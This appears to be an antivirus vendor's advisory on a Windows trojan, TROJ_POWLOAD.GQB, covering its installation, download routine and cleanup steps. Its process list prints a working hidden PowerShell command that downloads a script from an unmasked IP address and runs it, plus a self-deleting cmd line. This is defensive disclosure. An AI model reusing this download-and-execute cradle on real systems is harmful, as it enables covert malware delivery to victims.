This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

It executes the downloaded files. As a result, malicious routines of the downloaded files are exhibited on the affected system.

It deletes itself after execution.

Installation

This Trojan adds the following processes:

  • powershell.exe -nop -w hidden -c $J=new-object net.webclient;$J.proxy=[Net.WebRequest]::GetSystemWebProxy();$J.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $J.downloadstring('http://5.39.218.205/logo.png') - downloads a component file
  • cmd.exe /c ping -n 1 -w 2000 192.168.123.254 > nul & del {malware path and filename}.exe
  • rundll32 {TROJ_SWORT.VSYB - resides in memory}

Download Routine

This Trojan accesses the following websites to download files:

  • http://{BLOCKED}.{BLOCKED}.218.205/logo.png

Trend Micro detects the dowloaded file as:

  • TROJ_PLASTI.A

It then executes the downloaded files. As a result, malicious routines of the downloaded files are exhibited on the affected system.

Step 1

Before doing any scans, Windows XP, Windows Vista, and Windows 7 users must disable System Restore to allow full scanning of their computers.

Step 2

Restart in normal mode and scan your computer with your Trend Micro product for files detected as TROJ_POWLOAD.GQB. If the detected files have already been cleaned, deleted, or quarantined by your Trend Micro product, no further step is required. You may opt to simply delete the quarantined files.
